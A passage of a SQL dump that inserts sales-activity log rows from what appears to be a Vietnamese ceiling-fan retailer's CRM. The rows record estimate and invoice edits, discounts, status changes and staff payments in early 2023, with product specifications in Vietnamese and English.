(1724, 'estimate', 158, 'invoice_estimate_activity_updated_item_long_description', 'a:2:{i:0;s:793:\"Model: DCF-FS52930-60 <br />\r\nMotor Spec: BLDC Motor (Gearless Drive Technology), động cơ Gearless, 200-240 VAC; 50/60Hz, 10A, 1 phase. <br />\r\nBlades (Số cánh): 3 pcs <br />\r\nBlades Color : Dark Walnut (Màu gỗ tối - chất liệu gỗ tự nhiên nguyên khối) <br />\r\nDiameter (Sải cánh):  1.5 mét (60 inch)  <br />\r\nWeight * (Trọng lượng): 6.3 kg <br />\r\nSpeed (tốc độ quay): 197 RPM (speed at max) <br />\r\nWatts (công suất):  38 W (max) <br />\r\nNoise (độ ồn tốc độ cao):  &lt;35 dB(A) <br />\r\nPower input (nguồn điện): 220-240 VAC <br />\r\nEnvironment (môi trường sử dụng): trong nhà (indoor) <br />\r\nWarranty (Bảo hành): 05 năm <br />\r\nThương hiệu: Tổ chức đào tạo WIT - Made in China <br />\r\nBộ điều khiển từ xa RF đi kèm\";i:1;s:756:\"Model: DCF-FS52930-60 \r\nMotor Spec: BLDC Motor (Gearless Drive Technology), động cơ Gearless, 200-240 VAC; 50/60Hz, 10A, 1 phase. \r\nBlades (Số cánh): 3 pcs \r\nBlades Color : Dark Walnut (Màu gỗ tối - chất liệu gỗ tự nhiên nguyên khối) \r\nDiameter (Sải cánh):  1.5 mét (60 inch)  \r\nWeight * (Trọng lượng): 6.3 kg \r\nSpeed (tốc độ quay): 197 RPM (speed at max) \r\nWatts (công suất):  38 W (max) \r\nNoise (độ ồn tốc độ cao):  &lt;35 dB(A) \r\nPower input (nguồn điện): 220-240 VAC \r\nEnvironment (môi trường sử dụng): trong nhà (indoor) \r\nWarranty (Bảo hành): 05 năm \r\nThương hiệu: Tổ chức đào tạo WIT - Made in China \r\nBộ điều khiển từ xa RF đi kèm\r\nđã bao gồm chi phí vận chuyển \";}', '18', 'Phương Mỹ', '2023-01-04 12:14:05'),
(1725, 'estimate', 158, 'invoice_estimate_activity_removed_item', 'a:1:{i:0;s:49:\"Quạt trần 3 cánh gỗ PEARL 60 BN Maple Wood\";}', '18', 'Phương Mỹ', '2023-01-04 12:17:08'),
(1726, 'estimate', 158, 'invoice_estimate_activity_added_item', 'a:1:{i:0;s:49:\"Quạt trần 3 cánh gỗ PEARL 60 BN Maple Wood\";}', '18', 'Phương Mỹ', '2023-01-04 12:17:08'),
(1727, 'estimate', 156, 'invoice_estimate_activity_removed_item', 'a:1:{i:0;s:44:\"Quạt trần cánh gỗ ONIX 56 Sliver Wood\";}', '18', 'Phương Mỹ', '2023-01-04 13:53:48'),
(1728, 'estimate', 156, 'invoice_estimate_activity_added_item', 'a:1:{i:0;s:44:\"Quạt trần cánh gỗ ONIX 56 Sliver Wood\";}', '18', 'Phương Mỹ', '2023-01-04 13:53:48'),
(1729, 'invoice', 251, 'invoice_activity_created', '', '15', 'Linh Nguyen Thuy', '2023-01-05 09:48:09'),
(1730, 'estimate', 158, 'estimate_activity_converted', 'a:1:{i:0;s:76:\"<a href=\"https://hgphome.com/admin/invoices/list_invoices/251\">INV-DRAFT</a>\";}', '15', 'Linh Nguyen Thuy', '2023-01-05 09:48:09'),
(1731, 'invoice', 251, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>6</original_status>\";i:1;s:26:\"<new_status>1</new_status>\";}', '15', 'Linh Nguyen Thuy', '2023-01-05 09:48:18'),
(1732, 'invoice', 251, 'invoice_activity_marked_as_sent', 'a:0:{}', '15', 'Linh Nguyen Thuy', '2023-01-05 09:48:18'),
(1733, 'invoice', 204, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>3</original_status>\";i:1;s:26:\"<new_status>2</new_status>\";}', '1', 'Ho Gia Phat', '2023-01-05 13:50:43'),
(1734, 'invoice', 204, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:13:\"94.017.000 đ\";i:1;s:81:\"<a href=\"https://hgphome.com/admin/payments/payment/265\" target=\"_blank\">#265</a>\";}', '1', 'Ho Gia Phat', '2023-01-05 13:50:43'),
(1735, 'estimate', 157, 'invoice_estimate_activity_added_item', 'a:1:{i:0;s:41:\"Quạt trần cao cấp IRIS 60 White ABS\";}', '1', 'Ho Gia Phat', '2023-01-05 13:54:37'),
(1736, 'estimate', 157, 'invoice_estimate_activity_updated_qty_item', 'a:3:{i:0;s:46:\"Quạt trần 5 cánh gỗ NEXUS 60 maple wood\";i:1;s:4:\"2.00\";i:2;s:1:\"1\";}', '1', 'Ho Gia Phat', '2023-01-05 13:55:04'),
(1737, 'estimate', 157, 'invoice_estimate_activity_updated_qty_item', 'a:3:{i:0;s:36:\"Phí tuỳ chỉnh màu sắc quạt\";i:1;s:4:\"2.00\";i:2;s:1:\"1\";}', '1', 'Ho Gia Phat', '2023-01-05 13:55:04'),
(1738, 'invoice', 252, 'invoice_activity_created', '', '18', 'Phương Mỹ', '2023-01-06 08:42:24'),
(1739, 'estimate', 156, 'estimate_activity_converted', 'a:1:{i:0;s:76:\"<a href=\"https://hgphome.com/admin/invoices/list_invoices/252\">INV-DRAFT</a>\";}', '18', 'Phương Mỹ', '2023-01-06 08:42:24'),
(1740, 'invoice', 252, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>6</original_status>\";i:1;s:26:\"<new_status>2</new_status>\";}', '18', 'Phương Mỹ', '2023-01-06 08:42:46'),
(1741, 'invoice', 252, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:12:\"4.960.000 đ\";i:1;s:81:\"<a href=\"https://hgphome.com/admin/payments/payment/266\" target=\"_blank\">#266</a>\";}', '18', 'Phương Mỹ', '2023-01-06 08:42:46'),
(1742, 'invoice', 252, 'invoice_estimate_activity_updated_discount_item', 'a:2:{i:0;s:1:\"0\";i:1;s:2:\"20\";}', '18', 'Phương Mỹ', '2023-01-06 09:03:34'),
(1743, 'invoice', 250, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>3</original_status>\";i:1;s:26:\"<new_status>2</new_status>\";}', '1', 'Ho Gia Phat', '2023-01-09 08:24:52'),
(1744, 'invoice', 250, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:13:\"10.275.000 đ\";i:1;s:81:\"<a href=\"https://hgphome.com/admin/payments/payment/267\" target=\"_blank\">#267</a>\";}', '1', 'Ho Gia Phat', '2023-01-09 08:24:52'),
(1745, 'estimate', 159, 'estimate_activity_created', '', '18', 'Phương Mỹ', '2023-01-09 10:24:57'),
(1746, 'invoice', 219, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>3</original_status>\";i:1;s:26:\"<new_status>2</new_status>\";}', '17', 'Loan Nguyễn', '2023-01-09 14:03:42'),
(1747, 'invoice', 219, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:12:\"7.470.000 đ\";i:1;s:81:\"<a href=\"https://hgphome.com/admin/payments/payment/268\" target=\"_blank\">#268</a>\";}', '17', 'Loan Nguyễn', '2023-01-09 14:03:42'),
(1748, 'invoice', 253, 'invoice_activity_created', '', '18', 'Phương Mỹ', '2023-01-09 14:26:42'),
(1749, 'estimate', 159, 'estimate_activity_converted', 'a:1:{i:0;s:76:\"<a href=\"https://hgphome.com/admin/invoices/list_invoices/253\">INV-DRAFT</a>\";}', '18', 'Phương Mỹ', '2023-01-09 14:26:42'),
(1750, 'invoice', 253, 'invoice_estimate_activity_updated_discount_item', 'a:2:{i:0;s:1:\"0\";i:1;s:2:\"25\";}', '18', 'Phương Mỹ', '2023-01-09 14:34:36'),
(1751, 'invoice', 253, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>6</original_status>\";i:1;s:26:\"<new_status>1</new_status>\";}', '18', 'Phương Mỹ', '2023-01-09 14:35:23'),
(1752, 'invoice', 253, 'invoice_activity_marked_as_sent', 'a:0:{}', '18', 'Phương Mỹ', '2023-01-09 14:35:23'),
(1753, 'invoice', 253, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>2</new_status>\";}', '18', 'Phương Mỹ', '2023-01-09 15:22:33'),
(1754, 'invoice', 253, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:12:\"4.350.000 đ\";i:1;s:81:\"<a href=\"https://hgphome.com/admin/payments/payment/269\" target=\"_blank\">#269</a>\";}', '18', 'Phương Mỹ', '2023-01-09 15:22:33'),
(1755, 'invoice', 254, 'invoice_activity_created', '', '1', 'Ho Gia Phat', '2023-01-10 13:29:31'),
(1756, 'invoice', 254, 'invoice_estimate_activity_updated_item_rate', 'a:2:{i:0;s:9:\"680000.00\";i:1;s:10:\"6800000.00\";}', '1', 'Ho Gia Phat', '2023-01-10 13:30:08'),
(1757, 'invoice', 254, 'invoice_estimate_activity_added_item', 'a:1:{i:0;s:72:\"Bộ điều khiển AC gắn tường vuông 3 tốc độ Tổ chức đào tạo WIT\";}', '1', 'Ho Gia Phat', '2023-01-10 13:30:08'),
(1758, 'invoice', 254, 'invoice_estimate_activity_updated_discount_item', 'a:2:{i:0;s:2:\"40\";i:1;s:2:\"43\";}', '1', 'Ho Gia Phat', '2023-01-10 13:31:33'),
(1759, 'invoice', 254, 'invoice_estimate_activity_updated_item_rate', 'a:2:{i:0;s:9:\"250000.00\";i:1;s:9:\"350000.00\";}', '1', 'Ho Gia Phat', '2023-01-10 13:31:33'),
(1760, 'invoice', 254, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>6</original_status>\";i:1;s:26:\"<new_status>1</new_status>\";}', '1', 'Ho Gia Phat', '2023-01-10 13:33:43'),
(1761, 'invoice', 254, 'invoice_activity_marked_as_sent', 'a:0:{}', '1', 'Ho Gia Phat', '2023-01-10 13:33:43'),
(1762, 'invoice', 254, 'invoice_estimate_activity_added_item', 'a:1:{i:0;s:70:\"Nhân công lắp đặt quạt trần - Trần Thạch cao, La phông\";}', '17', 'Loan Nguyễn', '2023-01-11 10:34:09'),
(1763, 'invoice', 254, 'invoice_estimate_activity_removed_item', 'a:1:{i:0;s:70:\"Nhân công lắp đặt quạt trần - Trần Thạch cao, La phông\";}', '17', 'Loan Nguyễn', '2023-01-11 11:09:30'),
(1764, 'invoice', 240, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>4</new_status>\";}', '[CRON]', '[CRON]', '2023-01-11 11:43:14'),
(1765, 'invoice', 254, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>2</new_status>\";}', '17', 'Loan Nguyễn', '2023-01-11 16:08:07'),
(1766, 'invoice', 254, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:12:\"4.648.600 đ\";i:1;s:81:\"<a href=\"https://hgphome.com/admin/payments/payment/270\" target=\"_blank\">#270</a>\";}', '17', 'Loan Nguyễn', '2023-01-11 16:08:07'),
(1767, 'invoice', 251, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>2</new_status>\";}', '17', 'Loan Nguyễn', '2023-01-11 16:10:40'),
(1768, 'invoice', 251, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:12:\"6.479.000 đ\";i:1;s:81:\"<a href=\"https://hgphome.com/admin/payments/payment/271\" target=\"_blank\">#271</a>\";}', '17', 'Loan Nguyễn', '2023-01-11 16:10:40'),
(1769, 'invoice', 255, 'invoice_activity_created', '', '1', 'Ho Gia Phat', '2023-01-16 15:52:41'),
(1770, 'invoice', 255, 'invoice_estimate_activity_updated_item_long_description', 'a:2:{i:0;s:393:\"Sải cánh 152cm ( ~ 60inch)  <br />\r\nĐộng cơ DC, công nghệ từ nam châm BLDC, công suất ~ 40W  <br />\r\nĐiều khiển từ xa 5 cấp độ đi kèm (tuỳ chọn điều khiển gắn tường Bluetooth)  <br />\r\nMàu thân quạt: Matt White (Trắng mờ sơn tĩnh điện)  <br />\r\nMàu cánh: Gỗ sáng (Maple Wood)  <br />\r\nTuỳ chọn đèn: N/A (không có)  <br />\r\n\";i:1;s:353:\"Sải cánh 152cm ( ~ 60inch)  \r\nĐộng cơ DC, công nghệ từ nam châm BLDC, công suất ~ 40W  \r\nĐiều khiển từ xa 5 cấp độ đi kèm (tuỳ chọn điều khiển gắn tường Bluetooth)  \r\nMàu thân quạt: Matt White (Trắng mờ sơn tĩnh điện)  \r\nMàu cánh: Gỗ sáng (Maple Wood)  \r\nTuỳ chọn đèn: N/A (không có)\";}', '1', 'Ho Gia Phat', '2023-01-16 15:53:15'),
(1771, 'invoice', 255, 'invoice_estimate_activity_updated_qty_item', 'a:3:{i:0;s:52:\"Quạt trần 5 cánh gỗ ABACUS 60 Matt White Wood\";i:1;s:4:\"1.00\";i:2;s:1:\"2\";}', '1', 'Ho Gia Phat', '2023-01-16 15:53:15'),
(1772, 'invoice', 255, 'invoice_estimate_activity_added_item', 'a:1:{i:0;s:27:\"Ống ty treo quạt trần\";}', '1', 'Ho Gia Phat', '2023-01-16 15:53:15'),
(1773, 'invoice', 255, 'invoice_estimate_activity_updated_item_short_description', 'a:2:{i:0;s:27:\"Ống ty treo quạt trần\";i:1;s:44:\"Ống ty treo quạt trần\r\nĐộ dài 50cm\";}', '1', 'Ho Gia Phat', '2023-01-16 15:53:37'),
(1774, 'invoice', 255, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>6</original_status>\";i:1;s:26:\"<new_status>1</new_status>\";}', '1', 'Ho Gia Phat', '2023-01-16 15:54:06'),
(1775, 'invoice', 255, 'invoice_activity_marked_as_sent', 'a:0:{}', '1', 'Ho Gia Phat', '2023-01-16 15:54:06'),
(1776, 'estimate', 160, 'estimate_activity_created', '', '1', 'Ho Gia Phat', '2023-01-29 16:33:03'),
(1777, 'invoice', 255, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>2</new_status>\";}', '1', 'Ho Gia Phat', '2023-01-29 16:36:25'),
(1778, 'invoice', 255, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:13:\"11.980.000 đ\";i:1;s:81:\"<a href=\"https://hgphome.com/admin/payments/payment/272\" target=\"_blank\">#272</a>\";}', '1', 'Ho Gia Phat', '2023-01-29 16:36:25'),
(1779, 'estimate', 161, 'estimate_activity_created', '', '17', 'Loan Nguyễn', '2023-01-31 12:20:06'),
(1780, 'estimate', 162, 'estimate_activity_created', '', '17', 'Loan Nguyễn', '2023-02-01 13:11:23'),
(1781, 'invoice', 256, 'invoice_activity_created', '', '17', 'Loan Nguyễn', '2023-02-01 13:11:36'),
(1782, 'estimate', 162, 'estimate_activity_converted', 'a:1:{i:0;s:76:\"<a href=\"https://hgphome.com/admin/invoices/list_invoices/256\">INV-DRAFT</a>\";}', '17', 'Loan Nguyễn', '2023-02-01 13:11:36'),
(1783, 'invoice', 256, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>6</original_status>\";i:1;s:26:\"<new_status>2</new_status>\";}', '17', 'Loan Nguyễn', '2023-02-01 13:12:01'),
(1784, 'invoice', 256, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:12:\"4.875.000 đ\";i:1;s:81:\"<a href=\"https://hgphome.com/admin/payments/payment/273\" target=\"_blank\">#273</a>\";}', '17', 'Loan Nguyễn', '2023-02-01 13:12:01'),
(1785, 'invoice', 256, 'invoice_estimate_activity_updated_discount_item', 'a:2:{i:0;s:1:\"0\";i:1;s:2:\"25\";}', '17', 'Loan Nguyễn', '2023-02-01 13:15:04'),
(1786, 'invoice', 257, 'invoice_activity_created', '', '15', 'Linh Nguyen Thuy', '2023-02-03 13:32:56'),
(1787, 'estimate', 160, 'estimate_activity_converted', 'a:1:{i:0;s:76:\"<a href=\"https://hgphome.com/admin/invoices/list_invoices/257\">INV-DRAFT</a>\";}', '15', 'Linh Nguyen Thuy', '2023-02-03 13:32:56'),
(1788, 'invoice', 257, 'invoice_estimate_activity_updated_discount_item', 'a:2:{i:0;s:1:\"0\";i:1;s:2:\"25\";}', '17', 'Loan Nguyễn', '2023-02-03 13:35:44'),
(1789, 'invoice', 257, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>6</original_status>\";i:1;s:26:\"<new_status>1</new_status>\";}', '17', 'Loan Nguyễn', '2023-02-03 14:28:20'),
(1790, 'invoice', 257, 'invoice_activity_marked_as_sent', 'a:0:{}', '17', 'Loan Nguyễn', '2023-02-03 14:28:20'),
(1791, 'invoice', 257, 'invoice_estimate_activity_removed_item', 'a:1:{i:0;s:70:\"Nhân công lắp đặt quạt trần - Trần Thạch cao, La phông\";}', '17', 'Loan Nguyễn', '2023-02-03 16:04:44'),
(1792, 'invoice', 257, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>2</new_status>\";}', '17', 'Loan Nguyễn', '2023-02-03 16:48:57');
INSERT INTO `tblsales_activity` (`id`, `rel_type`, `rel_id`, `description`, `additional_data`, `staffid`, `full_name`, `date`) VALUES
(1793, 'invoice', 257, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:12:\"4.700.000 đ\";i:1;s:81:\"<a href=\"https://hgphome.com/admin/payments/payment/274\" target=\"_blank\">#274</a>\";}', '17', 'Loan Nguyễn', '2023-02-03 16:48:57'),
(1794, 'estimate', 163, 'estimate_activity_created', '', '17', 'Loan Nguyễn', '2023-02-06 09:30:48'),
(1795, 'invoice', 258, 'invoice_activity_created', '', '17', 'Loan Nguyễn', '2023-02-06 09:40:16'),
(1796, 'estimate', 163, 'estimate_activity_converted', 'a:1:{i:0;s:76:\"<a href=\"https://hgphome.com/admin/invoices/list_invoices/258\">INV-DRAFT</a>\";}', '17', 'Loan Nguyễn', '2023-02-06 09:40:16'),
(1797, 'invoice', 258, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>6</original_status>\";i:1;s:26:\"<new_status>1</new_status>\";}', '17', 'Loan Nguyễn', '2023-02-06 09:40:26'),
(1798, 'invoice', 258, 'invoice_activity_marked_as_sent', 'a:0:{}', '17', 'Loan Nguyễn', '2023-02-06 09:40:26'),
(1799, 'invoice', 258, 'invoice_estimate_activity_updated_discount_item', 'a:2:{i:0;s:1:\"0\";i:1;s:2:\"30\";}', '17', 'Loan Nguyễn', '2023-02-06 09:41:29'),
(1800, 'estimate', 161, 'estimate_activity_marked', 'a:1:{i:0;s:18:\"<status>2</status>\";}', '17', 'Loan Nguyễn', '2023-02-08 13:29:53'),
(1801, 'invoice', 259, 'invoice_activity_created', '', '17', 'Loan Nguyễn', '2023-02-08 13:32:46'),
(1802, 'estimate', 161, 'estimate_activity_converted', 'a:1:{i:0;s:76:\"<a href=\"https://hgphome.com/admin/invoices/list_invoices/259\">INV-DRAFT</a>\";}', '17', 'Loan Nguyễn', '2023-02-08 13:32:46'),
(1803, 'invoice', 259, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>6</original_status>\";i:1;s:26:\"<new_status>1</new_status>\";}', '17', 'Loan Nguyễn', '2023-02-08 13:32:59'),
(1804, 'invoice', 259, 'invoice_activity_marked_as_sent', 'a:0:{}', '17', 'Loan Nguyễn', '2023-02-08 13:32:59'),
(1805, 'invoice', 259, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>2</new_status>\";}', '17', 'Loan Nguyễn', '2023-02-08 13:33:51'),
(1806, 'invoice', 259, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:12:\"1.300.000 đ\";i:1;s:81:\"<a href=\"https://hgphome.com/admin/payments/payment/275\" target=\"_blank\">#275</a>\";}', '17', 'Loan Nguyễn', '2023-02-08 13:33:51'),
(1807, 'estimate', 164, 'estimate_activity_created', '', '1', 'Ho Gia Phat', '2023-02-13 16:11:03'),
(1808, 'estimate', 164, 'not_estimate_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>2</new_status>\";}', '1', 'Ho Gia Phat', '2023-02-13 16:11:08'),
(1809, 'estimate', 165, 'estimate_activity_created', '', '17', 'Loan Nguyễn', '2023-02-14 11:59:27'),
(1810, 'estimate', 165, 'invoice_estimate_activity_removed_item', 'a:1:{i:0;s:36:\"Quạt trần 5 cánh gỗ NEXUS 60 \";}', '17', 'Loan Nguyễn', '2023-02-14 12:16:25'),
(1811, 'estimate', 165, 'invoice_estimate_activity_removed_item', 'a:1:{i:0;s:70:\"Nhân công lắp đặt quạt trần - Trần Thạch cao, La phông\";}', '17', 'Loan Nguyễn', '2023-02-14 12:16:25'),
(1812, 'estimate', 165, 'invoice_estimate_activity_added_item', 'a:1:{i:0;s:50:\"Quạt trần 5 cánh gỗ ABACUS 60 BN Maple Wood\";}', '17', 'Loan Nguyễn', '2023-02-14 12:16:25'),
(1813, 'estimate', 165, 'invoice_estimate_activity_added_item', 'a:1:{i:0;s:70:\"Nhân công lắp đặt quạt trần - Trần Thạch cao, La phông\";}', '17', 'Loan Nguyễn', '2023-02-14 12:16:25'),
(1814, 'estimate', 166, 'estimate_activity_created', '', '1', 'Ho Gia Phat', '2023-02-14 13:47:41'),
(1815, 'estimate', 167, 'estimate_activity_created', '', '1', 'Ho Gia Phat', '2023-02-15 11:39:41'),
(1816, 'invoice', 260, 'invoice_activity_created', '', '9', 'Kỹ Thuật HGP | Tổ chức đào tạo WIT', '2023-02-15 12:29:07'),
(1817, 'estimate', 166, 'estimate_activity_converted', 'a:1:{i:0;s:77:\"<a href=\"https://hgphome.com/admin/invoices/list_invoices/260\">INV-255-23</a>\";}', '9', 'Kỹ Thuật HGP | Tổ chức đào tạo WIT', '2023-02-15 12:29:07'),
(1818, 'invoice', 260, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>2</new_status>\";}', '9', 'Kỹ Thuật HGP | Tổ chức đào tạo WIT', '2023-02-16 09:10:11'),
(1819, 'invoice', 260, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:12:\"1.050.000 đ\";i:1;s:81:\"<a href=\"https://hgphome.com/admin/payments/payment/276\" target=\"_blank\">#276</a>\";}', '9', 'Kỹ Thuật HGP | Tổ chức đào tạo WIT', '2023-02-16 09:10:11'),
(1820, 'estimate', 168, 'estimate_activity_created', '', '17', 'Loan Nguyễn', '2023-02-17 10:50:31'),
(1821, 'invoice', 261, 'invoice_activity_created', '', '17', 'Loan Nguyễn', '2023-02-17 10:50:39'),
(1822, 'estimate', 168, 'estimate_activity_converted', 'a:1:{i:0;s:76:\"<a href=\"https://hgphome.com/admin/invoices/list_invoices/261\">INV-DRAFT</a>\";}', '17', 'Loan Nguyễn', '2023-02-17 10:50:39'),
(1823, 'invoice', 261, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>6</original_status>\";i:1;s:26:\"<new_status>1</new_status>\";}', '17', 'Loan Nguyễn', '2023-02-17 10:50:59'),
(1824, 'invoice', 261, 'invoice_activity_marked_as_sent', 'a:0:{}', '17', 'Loan Nguyễn', '2023-02-17 10:50:59'),
(1825, 'invoice', 261, 'invoice_estimate_activity_updated_discount_item', 'a:2:{i:0;s:1:\"0\";i:1;s:2:\"25\";}', '17', 'Loan Nguyễn', '2023-02-17 10:51:29'),
(1826, 'invoice', 261, 'invoice_estimate_activity_updated_item_rate', 'a:2:{i:0;s:10:\"6500000.00\";i:1;s:10:\"4725000.00\";}', '17', 'Loan Nguyễn', '2023-02-17 11:03:32'),
(1827, 'invoice', 261, 'invoice_estimate_activity_updated_discount_item', 'a:2:{i:0;s:2:\"25\";i:1;s:1:\"0\";}', '17', 'Loan Nguyễn', '2023-02-17 11:03:32'),
(1828, 'invoice', 261, 'invoice_estimate_activity_updated_item_long_description', 'a:2:{i:0;s:0:\"\";i:1;s:34:\"Gồm Remote control và Controler\";}', '17', 'Loan Nguyễn', '2023-02-17 11:03:32'),
(1829, 'invoice', 261, 'invoice_estimate_activity_updated_item_rate', 'a:2:{i:0;s:9:\"500000.00\";i:1;s:9:\"750000.00\";}', '17', 'Loan Nguyễn', '2023-02-17 11:03:32'),
(1830, 'invoice', 261, 'invoice_estimate_activity_updated_item_short_description', 'a:2:{i:0;s:36:\"Quạt trần SINO LED 52 White Wood\";i:1;s:39:\"Bộ đèn LED Quạt trần SINO White\";}', '17', 'Loan Nguyễn', '2023-02-17 11:27:13'),
(1831, 'invoice', 261, 'invoice_estimate_activity_updated_item_long_description', 'a:2:{i:0;s:294:\"Sải cánh 132cm ( ~ 52inch)   <br />\r\nĐộng cơ DC, công nghệ từ nam châm BLDC, công suất ~ 35W   <br />\r\nMàu thân quạt: White  <br />\r\nMàu cánh: Gỗ sồi sáng (Maple Wood)   <br />\r\nĐèn LED: 3 màu, 2700K - 3000K   <br />\r\nĐiều khiển từ xa 5 tốc độ đi kèm\";i:1;s:71:\"Gồm: Nắp chụp đèn và     \r\nĐèn LED: 3 màu, 2700K - 3000K   \";}', '17', 'Loan Nguyễn', '2023-02-17 11:27:13'),
(1832, 'invoice', 261, 'invoice_estimate_activity_updated_item_rate', 'a:2:{i:0;s:10:\"4725000.00\";i:1;s:9:\"750000.00\";}', '17', 'Loan Nguyễn', '2023-02-17 11:27:13'),
(1833, 'invoice', 261, 'invoice_estimate_activity_updated_item_long_description', 'a:2:{i:0;s:77:\"Gồm: Nắp chụp đèn và     <br />\r\nĐèn LED: 3 màu, 2700K - 3000K   \";i:1;s:68:\"Gồm: Nắp chụp đèn và     \r\nĐèn LED: 3 màu, 2700K - 3000K\";}', '17', 'Loan Nguyễn', '2023-02-17 11:28:54'),
(1834, 'estimate', 169, 'estimate_activity_created', '', '17', 'Loan Nguyễn', '2023-02-17 15:05:08'),
(1835, 'estimate', 169, 'invoice_estimate_activity_updated_item_long_description', 'a:2:{i:0;s:296:\"Sải cánh 132cm ( ~ 52inch)   <br />\r\nĐộng cơ DC, công nghệ từ nam châm BLDC, công suất ~ 35W   <br />\r\nMàu thân quạt: White   <br />\r\nMàu cánh: Gỗ sồi sáng (Maple Wood)   <br />\r\nĐèn LED: 3 màu, 2700K - 3000K   <br />\r\nĐiều khiển từ xa 5 tốc độ đi kèm \";i:1;s:265:\"Sải cánh 132cm ( ~ 52inch)   \r\nĐộng cơ DC, công nghệ từ nam châm BLDC, công suất ~ 35W   \r\nMàu thân quạt: White   \r\nMàu cánh: Gỗ sồi sáng (Maple Wood)   \r\nĐèn LED: 3 màu, 2700K - 3000K   \r\nĐiều khiển từ xa 5 tốc độ đi kèm\";}', '17', 'Loan Nguyễn', '2023-02-17 15:06:32'),
(1836, 'estimate', 169, 'invoice_estimate_activity_removed_item', 'a:1:{i:0;s:70:\"Nhân công lắp đặt quạt trần - Trần Thạch cao, La phông\";}', '17', 'Loan Nguyễn', '2023-02-17 16:15:45'),
(1837, 'estimate', 169, 'invoice_estimate_activity_updated_item_rate', 'a:2:{i:0;s:10:\"5000000.00\";i:1;s:10:\"5500000.00\";}', '17', 'Loan Nguyễn', '2023-02-17 16:15:45'),
(1838, 'estimate', 169, 'invoice_estimate_activity_updated_item_long_description', 'a:2:{i:0;s:295:\"Sải cánh 132cm ( ~ 52inch)   <br />\r\nĐộng cơ DC, công nghệ từ nam châm BLDC, công suất ~ 35W   <br />\r\nMàu thân quạt: White   <br />\r\nMàu cánh: Gỗ sồi sáng (Maple Wood)   <br />\r\nĐèn LED: 3 màu, 2700K - 3000K   <br />\r\nĐiều khiển từ xa 5 tốc độ đi kèm\";i:1;s:380:\"Sải cánh 132cm ( ~ 52inch)   \r\nĐộng cơ DC, công nghệ từ nam châm BLDC, công suất ~ 35W   \r\nMàu thân quạt: White   \r\nMàu cánh: Gỗ sồi sáng (Maple Wood)   \r\nĐèn LED: 3 màu, 2700K - 3000K   \r\nĐiều khiển từ xa 5 tốc độ đi kèm\r\n- Đã bao gồm chi phí nhân công lắp đặt trần thạch cao, không bao gồm nguồn điện, xe nâng\";}', '17', 'Loan Nguyễn', '2023-02-17 16:15:45'),
(1839, 'estimate', 169, 'invoice_estimate_activity_added_item', 'a:1:{i:0;s:70:\"Nhân công lắp đặt quạt trần - Trần Thạch cao, La phông\";}', '17', 'Loan Nguyễn', '2023-02-17 16:23:19'),
(1840, 'estimate', 169, 'invoice_estimate_activity_updated_item_rate', 'a:2:{i:0;s:10:\"5500000.00\";i:1;s:10:\"4875000.00\";}', '17', 'Loan Nguyễn', '2023-02-17 16:32:07'),
(1841, 'estimate', 169, 'invoice_estimate_activity_updated_item_rate', 'a:2:{i:0;s:4:\"0.00\";i:1;s:9:\"625000.00\";}', '17', 'Loan Nguyễn', '2023-02-17 16:32:07'),
(1842, 'estimate', 169, 'invoice_estimate_activity_updated_item_long_description', 'a:2:{i:0;s:47:\"trần thạch cao lên trần bê tông >40 cm\";i:1;s:97:\"Tính thêm chi phí gia cố khoảng cách từ trần thạch cao lên trần bê tông >40 cm\";}', '17', 'Loan Nguyễn', '2023-02-17 16:32:07'),
(1843, 'invoice', 262, 'invoice_activity_created', '', '17', 'Loan Nguyễn', '2023-02-17 16:32:18'),
(1844, 'estimate', 169, 'estimate_activity_converted', 'a:1:{i:0;s:76:\"<a href=\"https://hgphome.com/admin/invoices/list_invoices/262\">INV-DRAFT</a>\";}', '17', 'Loan Nguyễn', '2023-02-17 16:32:18'),
(1845, 'invoice', 262, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>6</original_status>\";i:1;s:26:\"<new_status>1</new_status>\";}', '17', 'Loan Nguyễn', '2023-02-17 16:32:24'),
